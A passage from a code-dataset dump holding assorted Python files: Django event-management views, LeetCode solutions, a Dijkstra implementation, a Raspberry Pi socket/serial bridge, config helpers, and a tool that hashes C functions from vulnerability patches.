节点标注\nline.add(\"one\",attr,v1,is_fill=True,line_opacity=0.2,area_opacity=0.4,area_color='yellow',is_label_show=True)\n #平滑曲线\nline.add(\"two\",attr,v2,is_fill=True,line_opacity=0.8,area_opacity=0.2,area_color='green',is_smooth=True)\n\nline.render(r'C:\\Users\\Administrator\\Desktop\\数据可视化\\pyecharts\\html\\12.html')","sub_path":"数据可视化/pyecharts/12折线面积图.py","file_name":"12折线面积图.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"492812184","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author : richardchien\n@Date : 2020-04-14 21:59:54\n@LastEditors: yanyongyu\n@LastEditTime: 2020-04-14 22:12:11\n@Description : None\n@GitHub : https://github.com/richardchien\n\"\"\"\n__author__ = \"richardchien\"\n\nfrom nonebot import CommandGroup\n\n__plugin_name__ = \"bilibili\"\n\n\ndef __plugin_usage__(target, *args, **kwargs):\n if target == \"name\":\n return \"📺 bilibili番剧\"\n else:\n return \"📺 bilibili番剧\\n\\n最近有什么番\\n2018年1月有什么番\\nJOJO的奇妙冒险更新了没有\"\n\n\ncg = CommandGroup(\"bilibili_anime\")\n\nfrom . 
import commands, nlp\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"251567393","text":"class Solution:\n def reverseWords(self, s: str) -> str:\n #count the space\n num = s.count(\" \")\n sentence = s.split(\" \",num+1)\n sentence.reverse()\n out = \"\"\n while '' in sentence:\n sentence.remove('')\n for i in sentence:\n print(i)\n out = out + i + \" \"\n #print(out.count(' '))\n return out[:-1]","sub_path":"151.py","file_name":"151.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"642223404","text":"from django.utils.translation import ugettext_lazy as _\n\nfrom django.contrib import messages\nfrom django.contrib.auth import logout as logout_user\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect, reverse\nfrom django.http import HttpResponse, JsonResponse\nfrom django.utils import timezone\n\nfrom events.models.events import Event, CommonEvent, EventPhoto, Place, Attendee\nfrom events.models.profiles import Team, Organization, UserProfile, Member\nfrom events.forms import TeamEventForm, NewTeamEventForm, DeleteEventForm, EventCommentForm, NewPlaceForm, UploadEventPhotoForm, NewCommonEventForm\nfrom events import location\n\nimport datetime\nimport simplejson\n\n# Create your views here.\ndef events_list(request, *args, **kwargs):\n if not request.user.is_authenticated:\n return redirect('all-events')\n events = Event.objects.filter(attendees=request.user.profile, end_time__gt=timezone.now()).order_by('start_time')\n geo_ip = location.get_geoip(request)\n context = {\n 'active': 'my',\n 'events_list': sorted(events, key=lambda event: location.event_distance_from(geo_ip.latlng, event)),\n }\n return render(request, 'get_together/events/list_events.html', context)\n\ndef events_list_all(request, *args, **kwargs):\n events = Event.objects.filter(end_time__gt=timezone.now()).order_by('start_time')\n geo_ip = location.get_geoip(request)\n context = {\n 'active': 'all',\n 'events_list': sorted(events, key=lambda event: location.event_distance_from(geo_ip.latlng, event)),\n }\n return render(request, 'get_together/events/list_events.html', context)\n\ndef show_event(request, event_id, event_slug):\n event = Event.objects.get(id=event_id)\n comment_form = EventCommentForm()\n context = {\n 'team': event.team,\n 'event': event,\n 'comment_form': comment_form,\n 'is_attending': request.user.profile in event.attendees.all(),\n 'attendee_list': Attendee.objects.filter(event=event),\n 'can_edit_event': request.user.profile.can_edit_event(event),\n }\n return render(request, 'get_together/events/show_event.html', context)\n\n@login_required\ndef create_event_team_select(request):\n teams = request.user.profile.moderating\n if len(teams) == 1:\n return redirect('create-event', team_id=teams[0].id)\n\n return render(request, 'get_together/events/create_event_team_select.html', {'teams': teams})\n\n@login_required\ndef create_event(request, team_id):\n team = Team.objects.get(id=team_id)\n if not request.user.profile.can_create_event(team):\n messages.add_message(request, messages.WARNING, message=_('You can not create events for this team.'))\n return redirect('show-team', team_id=team.pk)\n\n new_event = Event(team=team, created_by=request.user.profile)\n\n\n if request.method == 'GET':\n if 'common' in 
request.GET and request.GET['common'] != '':\n            new_event.parent = CommonEvent.objects.get(id=request.GET['common'])\n        form = NewTeamEventForm(instance=new_event)\n\n        context = {\n            'event': new_event,\n            'team': team,\n            'event_form': form,\n        }\n        return render(request, 'get_together/events/create_event.html', context)\n    elif request.method == 'POST':\n        if 'common' in request.POST and request.POST['common'] != '':\n            new_event.parent = CommonEvent.objects.get(id=request.POST['common'])\n        form = NewTeamEventForm(request.POST, instance=new_event)\n        if form.is_valid():\n            new_event = form.save()\n            Attendee.objects.create(event=new_event, user=request.user.profile, role=Attendee.HOST, status=Attendee.YES)\n            return redirect('add-place', new_event.id)\n        else:\n            context = {\n                'event': new_event,\n                'team': team,\n                'event_form': form,\n            }\n            return render(request, 'get_together/events/create_event.html', context)\n    else:\n        return redirect('home')\n\ndef add_event_photo(request, event_id):\n    event = Event.objects.get(id=event_id)\n    if not request.user.profile.can_edit_event(event):\n        messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n        return redirect(event.get_absolute_url())\n\n    if request.method == 'GET':\n        form = UploadEventPhotoForm()\n\n        context = {\n            'event': event,\n            'photo_form': form,\n        }\n        return render(request, 'get_together/events/add_photo.html', context)\n    elif request.method == 'POST':\n        new_photo = EventPhoto(event=event)\n        form = UploadEventPhotoForm(request.POST, request.FILES, instance=new_photo)\n        if form.is_valid():\n            form.save()\n            return redirect(event.get_absolute_url())\n        else:\n            context = {\n                'event': event,\n                'photo_form': form,\n            }\n            return render(request, 'get_together/events/add_photo.html', context)\n    else:\n        return redirect('home')\n\ndef add_place_to_event(request, event_id):\n    event = Event.objects.get(id=event_id)\n    if not request.user.profile.can_edit_event(event):\n        messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n        return redirect(event.get_absolute_url())\n\n    if request.method == 'GET':\n        form = NewPlaceForm()\n\n        context = {\n            'event': event,\n            'place_form': form,\n        }\n        return render(request, 'get_together/places/create_place.html', context)\n    elif request.method == 'POST':\n        form = NewPlaceForm(request.POST)\n        if form.is_valid():\n            if request.POST.get('id', None):\n                form.instance.id = request.POST.get('id')\n            new_place = form.save()\n            event.place = new_place\n            event.save()\n            return redirect('share-event', event.id)\n        else:\n            context = {\n                'event': event,\n                'place_form': form,\n            }\n            return render(request, 'get_together/places/create_place.html', context)\n    else:\n        return redirect('home')\n\ndef share_event(request, event_id):\n    event = Event.objects.get(id=event_id)\n    context = {\n        'event': event,\n    }\n    return render(request, 'get_together/events/share_event.html', context)\n\ndef edit_event(request, event_id):\n    event = Event.objects.get(id=event_id)\n\n    if not request.user.profile.can_edit_event(event):\n        messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n        return redirect(event.get_absolute_url())\n\n    if request.method == 'GET':\n        form = TeamEventForm(instance=event)\n\n        context = {\n            'team': event.team,\n            'event': event,\n            'event_form': form,\n        }\n        return render(request, 'get_together/events/edit_event.html', context)\n    elif request.method == 'POST':\n        form = TeamEventForm(request.POST,instance=event)\n        if 
form.is_valid():\n            new_event = form.save()\n            return redirect(new_event.get_absolute_url())\n        else:\n            context = {\n                'team': event.team,\n                'event': event,\n                'event_form': form,\n            }\n            return render(request, 'get_together/events/edit_event.html', context)\n    else:\n        return redirect('home')\n\ndef delete_event(request, event_id):\n    event = Event.objects.get(id=event_id)\n    if not request.user.profile.can_edit_event(event):\n        messages.add_message(request, messages.WARNING, message=_('You can not make changes to this event.'))\n        return redirect(event.get_absolute_url())\n\n    if request.method == 'GET':\n        form = DeleteEventForm()\n\n        context = {\n            'team': event.team,\n            'event': event,\n            'delete_form': form,\n        }\n        return render(request, 'get_together/events/delete_event.html', context)\n    elif request.method == 'POST':\n        form = DeleteEventForm(request.POST)\n        if form.is_valid() and form.cleaned_data['confirm']:\n            team_id = event.team_id\n            event.delete()\n            return redirect('show-team', team_id)\n        else:\n            context = {\n                'team': event.team,\n                'event': event,\n                'delete_form': form,\n            }\n            return render(request, 'get_together/events/delete_event.html', context)\n    else:\n        return redirect('home')\n\ndef show_common_event(request, event_id, event_slug):\n    event = CommonEvent.objects.get(id=event_id)\n    context = {\n        'org': event.organization,\n        'common_event': event,\n        'can_edit_event': False,\n    }\n    return render(request, 'get_together/orgs/show_common_event.html', context)\n\n@login_required\ndef create_common_event(request, org_slug):\n    org = Organization.objects.get(slug=org_slug)\n    if not request.user.profile.can_create_common_event(org):\n        messages.add_message(request, messages.WARNING, message=_('You can not create events for this org.'))\n        return redirect('show-org', org_id=org.pk)\n\n    new_event = CommonEvent(organization=org, created_by=request.user.profile)\n    if request.method == 'GET':\n        form = NewCommonEventForm(instance=new_event)\n\n        context = {\n            'org': org,\n            'event_form': form,\n        }\n        return render(request, 'get_together/orgs/create_common_event.html', context)\n    elif request.method == 'POST':\n        form = NewCommonEventForm(request.POST, instance=new_event)\n        if form.is_valid():\n            new_event = form.save()\n            return redirect('show-common-event', new_event.id, new_event.slug)\n        else:\n            context = {\n                'org': org,\n                'event_form': form,\n            }\n            return render(request, 'get_together/orgs/create_common_event.html', context)\n    else:\n        return redirect('home')\n\ndef share_common_event(request, event_id):\n    event = CommonEvent.objects.get(id=event_id)\n    context = {\n        'event': event,\n    }\n    return render(request, 'get_together/orgs/share_common_event.html', context)\n\n@login_required\ndef create_common_event_team_select(request, event_id):\n    teams = request.user.profile.moderating\n    if len(teams) == 1:\n        return redirect(reverse('create-event', kwargs={'team_id':teams[0].id}) + '?common=%s'%event_id)\n    context = {\n        'common_event_id': event_id,\n        'teams': teams\n    }\n    return render(request, 'get_together/orgs/create_common_event_team_select.html', context)\n\n\n","sub_path":"get_together/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113430998","text":"from recommendation.common.models import Segment\n\nclass BasicIndexPOI(object):\n    def __init__(self,id,longitude,latitude,tag):\n        self.id = id\n        self.longitude = float(longitude)\n        self.latitude = float(latitude)\n        self.tag = 
tag\n\nclass OrderIndexPOI(object):\n    def __init__(self, id, longitude, latitude, tag, hot):\n        self.id = id\n        self.longitude = float(longitude)\n        self.latitude = float(latitude)\n        self.tag = tag\n        self.hot = hot\n\nclass LocationIndexPOI(BasicIndexPOI):\n    def __init__(self,id,longitude,latitude,tag,rank,roads,type):\n        super(LocationIndexPOI,self).__init__(id,longitude,latitude,tag)\n        self.rank = rank\n        self.roads = roads\n        self.type = type\n\nclass POI(BasicIndexPOI):\n    def __init__(self,id,longitude,latitude,tag,rank,code,mdistance,board,off,mlong,mlat):\n        super(POI,self).__init__(id,longitude,latitude,tag)\n        self.tag = tag\n        self.rank = rank\n        self.code = code\n        self.mdistance = mdistance\n        self.board = board\n        self.off = off\n        self.mlong = mlong\n        self.mlat = mlat\n\nclass RoadIndexPOI():\n    def __init__(self, segment, type):\n        self.segment = segment\n        self.type = type\n\nclass EBoardPOI():\n    def __init__(self,longitude,latitude,r_longitude,r_latitude):\n        self.longitude = longitude\n        self.latitude = latitude\n        self.r_longitude = r_longitude\n        self.r_latitude = r_latitude\n\nclass Record:\n    def __init__(self, pid, longitude1, latitude1, longitude2, latitude2, poi):\n        #self.id = long(pid)\n        self.id = 1\n        self.coordinate = (float(longitude1),float(latitude1),float(longitude2),float(latitude2))\n        self.poi = poi\n\n\n\n","sub_path":"recommendation/offline/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243187453","text":"def soma(lista):\n    total = 0\n    for elem in lista:\n        total += elem\n    return total\n\ndef media(lista):\n    return soma(lista)/len(lista)\n\ndef distintos(lista):\n    for i in range(len(lista)):\n        for j in range(i + 1, len(lista)):\n            if (lista[i] == lista[j]):\n                return False\n    return True\n\ndef maior(lista):\n    aux = lista[0]\n    for i in range(1, len(lista)):\n        if (lista[i] > aux):\n            aux = lista[i]\n    return aux\n\ndef menor(lista):\n    aux = lista[0]\n    for i in range(1, len(lista)):\n        if (lista[i] < aux):\n            aux = lista[i]\n    return aux\n\ndef ordenado(lista):\n    for i in range(len(lista) - 1):\n        if (lista[i] > lista[i + 1]):\n            return False\n    return True\n","sub_path":"semana_13/exercicios/funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"249559945","text":"'''\nLongest Common Prefix\nWrite a function to find the longest common prefix in an array of strings.\nIf there is no common prefix, return the empty string \"\".\nExample 1:\nInput: strs = [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\nInput: strs = [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: the inputs share no common prefix.\n\nTopic tag: strings\n'''\n\nfrom typing import List\n\n\n# Approach 1: horizontal scan\n\nclass Solution:\n    def longestCommonPrefix(self, strs: List[str]) -> str:\n        if not strs:  # if the list is empty, return the empty string (no common prefix exists)\n            return \"\"\n\n        def lcp(str1, str2):\n            length = min(len(str1), len(str2))\n            index = 0\n            while index < length and str1[index] == str2[index]:\n                index += 1\n            return str1[:index]\n\n        pre = strs[0]\n        len_str1 = len(strs)\n        for i in range(1, len_str1):\n            pre = lcp(pre, strs[i])\n            if not pre:  # prune: once the running prefix is empty, no later string can extend it\n                break\n        return pre\n\n\n'''\nSolution walkthrough:\nhttps://leetcode-cn.com/problems/longest-common-prefix/solution/zui-chang-gong-gong-qian-zhui-by-leetcode-solution/\n'''\n","sub_path":"腾讯/数组与字符串/最长公共前缀.py","file_name":"最长公共前缀.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"552498901","text":"#!/usr/bin/env python3\n\nfrom configparser 
import ConfigParser\nfrom shutil import copyfile\nimport os\n\nHOME = os.path.expanduser(\"~\")\n\nDEFAULT_CFG_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../ShowControl/default.cfg'))\n\nCFG_DIR = HOME + '/.showcontrol'\nCFG_PATH = CFG_DIR + '/config.cfg'\n\n\ndef checkUserConf():\n    newcfg = True\n    if(not os.path.exists(CFG_PATH)):\n        if(not os.path.exists(CFG_DIR)):\n            os.makedirs(CFG_DIR)\n    else:\n        default = ConfigParser()\n        default.read(DEFAULT_CFG_PATH)\n        current = ConfigParser()\n        current.read(CFG_PATH)\n        if('Version' in current):\n            newcfg = current['Version']['Number'] != default['Version']['Number']\n        if(newcfg):\n            copyfile(CFG_PATH, CFG_PATH + '.old')\n            print('Old configuration file backup -> ' + CFG_PATH + '.old')\n\n    if(newcfg):\n        copyfile(DEFAULT_CFG_PATH, CFG_PATH)\n        print('Create configuration file -> ' + CFG_PATH)\n    else:\n        print(\"Configuration is up to date\")\n\ncheckUserConf()\n\nconfig = ConfigParser()\nconfig.read(CFG_PATH)\nconfig.keys()\n\n\ndef toDict():\n    conf_dict = {}\n    for key in config.keys():\n        conf_dict[key] = {}\n        for skey in config[key].keys():\n            conf_dict[key][skey] = config[key][skey]\n    return conf_dict\n\n\ndef updateFromDict(conf):\n    for key in conf.keys():\n        for skey in conf[key].keys():\n            config[key][skey] = conf[key][skey]\n\n\ndef write():\n    with open(CFG_PATH, 'w') as cfgfile:\n        config.write(cfgfile)\n","sub_path":"CueEngine/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"153767672","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nfrom typing import List\nimport pytest\n@pytest.fixture(scope='session',autouse=True)\ndef status():\n    print(\"Starting test session\")\n    yield\n    print(\"Test session finished\")\ndef pytest_collection_modifyitems(\n    session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n    \"\"\"\n    Display Chinese characters correctly in test case ids\n    \"\"\"\n    for item in items:\n\n        item.name = item.name.encode('utf-8').decode('unicode-escape')\n        item._nodeid = item.nodeid.encode('utf8').decode('unicode-escape')\n","sub_path":"api/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"187018199","text":"import sys\nclass Graph:\n    def __init__(self,vertices):\n        self.V = vertices\n        self.graph = [[0 for i in range(vertices)] for j in range(vertices)]\n    \n    def findMin(self,visited,cost):\n        min_cost = sys.maxsize\n        for i in range(0,self.V):\n            if(not visited[i] and min_cost>cost[i]):\n                min_cost = min(min_cost,cost[i])\n                min_index = i\n        return min_index\n    def dijkstra(self,source):\n        visited = [False]*(self.V)\n        cost = [sys.maxsize]*(self.V)\n\n        cost[source] = 0\n        for i in range(0,self.V):\n            min_vertex = self.findMin(visited,cost)\n            visited[min_vertex] =True\n            for j in range(0,self.V):\n                if(not visited[j] and self.graph[min_vertex][j]>0):\n                    cost[j] = min(cost[j],self.graph[min_vertex][j] + cost[min_vertex])\n        \n        return cost\ng = Graph(9) \ng.graph = [[0, 4, 0, 0, 0, 0, 0, 8, 0], \n           [4, 0, 8, 0, 0, 0, 0, 11, 0], \n           [0, 8, 0, 7, 0, 4, 0, 0, 2], \n           [0, 0, 7, 0, 9, 14, 0, 0, 0], \n           [0, 0, 0, 9, 0, 10, 0, 0, 0], \n           [0, 0, 4, 14, 10, 0, 2, 0, 0], \n           [0, 0, 0, 0, 0, 2, 0, 1, 6], \n           [8, 11, 0, 0, 0, 0, 1, 0, 7], \n           [0, 0, 2, 0, 0, 0, 6, 7, 0] \n          ]; \n \nprint(g.dijkstra(0)) \n    ","sub_path":"Graph Theory 
Algos/Dijkstra.py","file_name":"Dijkstra.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"606655761","text":"\nimport urllib.request\nimport urllib3\nimport serial\nimport json\nimport socket\nimport threading\nHOST = ''\nPORT = 8888\n_url = 'http://168.131.152.196/common.php'\n\ndef dispatch_Socket():\n global _conn\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((HOST, PORT))\n s.listen(1)\n while True:\n (_conn, addr) = s.accept()\n global _recieveJsonData\n _recieveData = ''\n _cnt = 0\n while True:\n tmp = _conn.recv(1).decode('utf-8')\n _recieveData += tmp\n if (tmp == '{'):\n _cnt = (_cnt + 1)\n elif (tmp == '}'):\n _cnt = (_cnt - 1)\n if (_cnt == 0):\n break\n if (_recieveData == ''):\n continue\n _recieveJsonData = json.loads(_recieveData)\n funid = _recieveJsonData['_funid']\n if (funid == 9):\n sendMessage()\n funid = (- 1)\n\ndef dispatch_Serial():\n global _ser, _jsonData\n _ser = serial.Serial('/dev/ttyACM0', 9600)\n while True:\n jsonStr = _ser.readline().strip().decode('utf-8')\n if (jsonStr == ''):\n continue\n _jsonData = json.loads(jsonStr)\n funid = _jsonData['_funid']\n if (funid == 10):\n reqSend()\n funid = (- 1)\n\ndef sendMessage():\n _recieveData = ''\n _cnt = 0\n while True:\n tmp = _conn.recv(1).decode('utf-8')\n _recieveData += tmp\n if (tmp == '{'):\n _cnt = (_cnt + 1)\n elif (tmp == '}'):\n _cnt = (_cnt - 1)\n if (_cnt == 0):\n break\n global _jsonData\n if (_recieveData != ''):\n _jsonData = json.loads(_recieveData)\n else:\n _jsonData = ''\n if (_jsonData != ''):\n data = _jsonData['args0']\n global ser\n ser = serial.Serial('/dev/ttyACM0', 9600)\n _sendData = {}\n _sendData['_funid'] = 14\n _sendFunid = json.dumps(_sendData)\n ser.write(_sendFunid.encode('utf-8'))\n ser.write('\\n'.encode('utf-8'))\n _sendData.clear()\n _sendData['args0'] = data\n _jsonData = json.dumps(_sendData)\n ser.write(_jsonData.encode('utf-8'))\n ser.write('\\n'.encode('utf-8'))\n ser.close()\n\ndef reqSend():\n _recieveData = _ser.readline().strip().decode('utf-8')\n global _recieveJsonData\n if (_recieveData != ''):\n _recieveJsonData = json.loads(_recieveData)\n else:\n _recieveJsonData = ''\n if (_recieveJsonData != ''):\n val = _recieveJsonData['args0']\n val = ord(val)\n if (val == 48):\n pic_bin = takeAPhoto()\n _field_dict = {}\n _field_dict['_funid'] = 6\n _field_dict['args0'] = c\n _field_dict['args1'] = pic_bin\n req = urllib3.PoolManager()\n req.request('POST', _url, fields=_field_dict)\n if (val == 49):\n pic_bin = takeAPhoto()\n _field_dict = {}\n _field_dict['_funid'] = 6\n _field_dict['args0'] = o\n _field_dict['args1'] = pic_bin\n req = urllib3.PoolManager()\n req.request('POST', _url, fields=_field_dict)\n\ndef takeAPhoto():\n r = urllib.request.urlopen('http://168.131.151.110:8080/stream/snapshot.jpeg')\n pic_bin = r.read()\n return pic_bin\nthread0 = threading.Thread(target=dispatch_Socket, args=())\nthread1 = threading.Thread(target=dispatch_Serial, args=())\nthread0.start()\nthread1.start()\nthread0.join()\nthread1.join()\n","sub_path":"unipy/output/MyRaspberry.py","file_name":"MyRaspberry.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496941900","text":"import os\nimport subprocess\nimport config, mongodb, sys, re, csv\nfrom unidiff import PatchSet\nfrom collections import defaultdict\nimport logging\nimport linecache\nimport 
hashlib,time\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='myapp3.log',\n filemode='w')\n#################################################################################################\n#定义一个StreamHandler,将INFO级别或更高的日志信息打印到标准错误,并将其添加到当前的日志处理对象#\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger('').addHandler(console)\n\n\ndef clean_generate_folder(path):\n if os.path.exists(path):\n os.system(\"rm -r %s\"%path)\n os.makedirs(path)\n else:\n os.makedirs(path)\n\ndef loadSource(input_folder):\n maxFileSizeInBytes = 2*1024*1024\n srcFileList = []\n for path, dirs, files in os.walk(input_folder):\n for fileName in files:\n ext = fileName.lower()\n if ext.endswith('.c') or ext.endswith('.cpp') or ext.endswith('.cc') or ext.endswith('.c++') or ext.endswith('.cxx'):\n filepath = os.path.join(path, fileName)\n if maxFileSizeInBytes is not None:\n if os.path.getsize(filepath) < maxFileSizeInBytes:\n srcFileList.append(filepath)\n else:\n srcFileList.append(filepath)\n return srcFileList\n\n\ndef removeComment(string):\n c_regex = re.compile(\n r'(?P//.*?$|[{}]+)|(?P/\\*.*?\\*/)|(?P\\'(\\\\.|[^\\\\\\'])*\\'|\"(\\\\.|[^\\\\\"])*\"|.[^/\\'\"]*)',\n re.DOTALL | re.MULTILINE)\n return ''.join([c.group('noncomment') for c in c_regex.finditer(string) if c.group('noncomment')])\n\n\ndef normalize(string):\n return ''.join(string.replace('\\n', '').replace('\\r', '').replace('\\t', '').replace('{', '').replace('}', '').split(\n ' ')).lower()\n\n\ndef abstract(func_infos, index, level):\n originalFunctionBody = func_infos[\"funcBody\"][index]\n originalFunctionBody = removeComment(originalFunctionBody)\n if int(level) >= 0: # No abstraction.\n abstractBody = originalFunctionBody\n if int(level) >= 1: # PARAM\n parameterList = func_infos[\"parameterList\"]\n for param in parameterList:\n if len(param) == 0:\n continue\n try:\n paramPattern = re.compile(\"(^|\\W)\" + param + \"(\\W)\")\n abstractBody = paramPattern.sub(\"\\g<1>FPARAM\\g<2>\", abstractBody)\n except:\n pass\n if int(level) >= 2: # DTYPE\n dataTypeList = func_infos[\"dataTypeList\"]\n for dtype in dataTypeList:\n if len(dtype) == 0:\n continue\n try:\n dtypePattern = re.compile(\"(^|\\W)\" + dtype + \"(\\W)\")\n abstractBody = dtypePattern.sub(\"\\g<1>DTYPE\\g<2>\", abstractBody)\n except:\n pass\n if int(level) >= 3: # LVAR\n variableList = func_infos[\"variableList\"]\n for lvar in variableList:\n if len(lvar) == 0:\n continue\n try:\n lvarPattern = re.compile(\"(^|\\W)\" + lvar + \"(\\W)\")\n abstractBody = lvarPattern.sub(\"\\g<1>LVAR\\g<2>\", abstractBody)\n except:\n pass\n if int(level) >= 4: # FUNCCALL\n funcCalleeList = func_infos[\"funcCalleeList\"]\n for fcall in funcCalleeList:\n if len(fcall) == 0:\n continue\n try:\n fcallPattern = re.compile(\"(^|\\W)\" + fcall + \"(\\W)\")\n abstractBody = fcallPattern.sub(\"\\g<1>FUNCCALL\\g<2>\", abstractBody)\n except:\n pass\n return abstractBody\n\n\ndef parsefile_deep_multi(srcFileName):\n javaCallCommand = \"java -Xmx1024m -jar %s %s\" % (config.opt_jar, srcFileName)\n try:\n astString = subprocess.check_output(javaCallCommand, stderr=subprocess.STDOUT, shell=True)\n astString = astString.decode('utf-8')\n except subprocess.CalledProcessError as e:\n logging.error(\"Parser Error: %s\" % str(e))\n 
astString = \"\"\n delimiter = \"\\r\\0?\\r?\\0\\r\"\n funcList = astString.split(delimiter)\n func_infos = defaultdict(list)\n for func in funcList[1:]:\n elemsList = func.split('\\n')[1:-1]\n if len(elemsList) > 9:\n func_infos[\"parentNumLoc\"].append(int(elemsList[1]))\n func_infos[\"name\"].append(elemsList[2])\n func_infos[\"lines\"].append([int(elemsList[3].split('\\t')[0]), int(elemsList[3].split('\\t')[1])])\n func_infos[\"funcId\"].append(elemsList[4])\n func_infos[\"parameterList\"].append(elemsList[5].rstrip().split('\\t'))\n func_infos[\"variableList\"].append(elemsList[6].rstrip().split('\\t'))\n func_infos[\"dataTypeList\"].append(elemsList[7].rstrip().split('\\t'))\n func_infos[\"funcCalleeList\"].append(elemsList[8].rstrip().split('\\t'))\n func_infos[\"funcBody\"].append('\\n'.join(elemsList[9:]))\n return func_infos\n\n\ndef generate_cli(targetPath):\n absLevel = 4\n logging.info(\"PROJ:%s\" % targetPath)\n logging.info(\"Loading source files... This may take a few minutes.\")\n input_files = loadSource(targetPath)\n function_info_list = defaultdict(list)\n if len(input_files) == 0:\n logging.error(\"Failed loading source files.\")\n logging.error(\"Check if you selected proper directory, or if your project contains .c or .cpp files.\")\n else:\n logging.info(\"Load complete. Generating hashmark...\")\n for file in input_files:\n logging.info(\"[%d/%d]\\t%s\" % (input_files.index(file), len(input_files), file))\n func_infos = parsefile_deep_multi(file)\n for index in range(len(func_infos[\"funcBody\"])):\n absBody = abstract(func_infos, index, absLevel)\n absBody = removeComment(absBody)\n absBody = normalize(absBody)\n funcLen = len(absBody)\n if funcLen > config.function_char_length:\n m = hashlib.md5()\n m.update(absBody.encode('utf-8'))\n hashValue = m.hexdigest()\n function_info_list[\"function_hash\"].append(hashValue)\n function_info_list[\"function_name\"].append(func_infos[\"name\"][index])\n function_info_list[\"function_code\"].append(func_infos[\"funcBody\"][index])\n function_info_list[\"function_location\"].append(func_infos[\"lines\"])\n logging.info(\"finished hashmark...\")\n return function_info_list\n\n\ndef parse_diff(path_to_patch, patch_temp_path):\n _, ext = os.path.splitext(path_to_patch)\n filename_info = {}\n tmp_file = os.path.join(patch_temp_path, 'tmp' + ext)\n with open(tmp_file, 'w+') as w:\n with open(path_to_patch, encoding='utf-8', errors='ignore') as r:\n w.write(r.read())\n patches = PatchSet.from_filename(tmp_file)\n for patch in patches:\n filename = '/'.join(patch.source_file.split('/')[1:])\n if filename[-2:] != '.c' and filename[-4:] != '.cpp' and filename[-4:] != '.cxx':\n continue\n patch_info_commit = patch.patch_info[-1]\n patch_info_processed = patch_info_commit[6:]\n ori_commit = patch_info_processed.split('..')[0]\n fix_commit = patch_info_processed.split('..')[1].split(' ')[0]\n filename_info[filename] = [ori_commit, fix_commit]\n return filename_info\n\n\ndef generate_file(filename_info, repo_path, ori_temp_path, fix_temp_path, CVE_id, proj_name):\n for filename, commits in filename_info.items():\n ori_commit = commits[0]\n fix_commit = commits[1]\n try:\n fix_cmd = 'cd %s && git show %s' % (repo_path, fix_commit)\n fix_output = subprocess.check_output(fix_cmd, shell=True, encoding='utf-8', errors='ignore')\n fix_filename = os.path.join(fix_temp_path, proj_name + '_' + CVE_id + '_' + '%s.c' % fix_commit)\n with open(fix_filename, 'w', encoding='utf-8', errors='ignore') as f:\n f.write(fix_output.rstrip())\n except 
Exception as e:\n logging.info(\"fix commit cannot find in repo: %s\" % str(e))\n continue\n try:\n ori_cmd = 'cd %s && git show %s' % (repo_path, ori_commit)\n ori_output = subprocess.check_output(ori_cmd, shell=True, encoding='utf-8', errors='ignore')\n ori_filename = os.path.join(ori_temp_path, proj_name + '_' + CVE_id+ '_' + '%s.c' % ori_commit)\n with open(ori_filename, 'w', encoding='utf-8', errors='ignore') as f:\n f.write(ori_output.rstrip())\n except Exception as e:\n logging.info(\"ori commit cannot find in repo: %s\" % str(e))\n continue\n\n\ndef generate_ori_fix_files_by_patchinfo(patch_file, git_repo, CVE_id, proj_name):\n ori_temp_path = os.path.join(config.temp_path, 'ori_files')\n fix_temp_path = os.path.join(config.temp_path, 'fix_files')\n patch_temp_path = os.path.join(config.temp_path, \"patch_file\")\n clean_generate_folder(ori_temp_path)\n clean_generate_folder(fix_temp_path)\n clean_generate_folder(patch_temp_path)\n time.sleep(1)\n try:\n filename_info = parse_diff(patch_file, patch_temp_path)\n logging.info(filename_info)\n if len(filename_info) == 0:\n logging.error(\"parse diff error\")\n return [], []\n generate_file(filename_info, git_repo, ori_temp_path, fix_temp_path, CVE_id, proj_name)\n except 